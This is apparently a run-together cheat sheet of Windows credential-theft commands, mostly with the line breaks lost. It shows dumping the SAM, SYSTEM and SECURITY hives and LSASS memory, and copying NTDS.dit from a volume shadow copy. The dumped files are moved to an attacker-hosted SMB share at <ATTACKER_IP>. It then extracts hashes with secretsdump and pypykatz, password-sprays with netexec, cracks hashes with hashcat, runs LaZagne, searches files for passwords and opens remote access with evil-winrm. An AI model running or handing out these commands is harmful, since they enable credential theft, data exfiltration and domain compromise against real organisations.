reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.savesudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/savemove sam.save \\<ATTACKER_IP>\CompData
move system.save \\<ATTACKER_IP>\CompData
move security.save \\<ATTACKER_IP>\CompDatapython3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCALtasklist /svc | findstr lsassGet-Process lsassrundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp fullpypykatz lsa minidump /path/to/lsass.dmpnetexec smb <DC_IP> -u <username> -p <password_list>vssadmin create shadow /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>netexec smb <DC_IP> -u <username> -p <password> --ntds64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txtlazagne.exe all
# Verbose mode
lazagne.exe all -vvfindstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.ymlnetexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsanetexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --samnetexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --ntdsnet localgroupnet user <username>evil-winrm -i <DC_IP> -u <username> -p <password>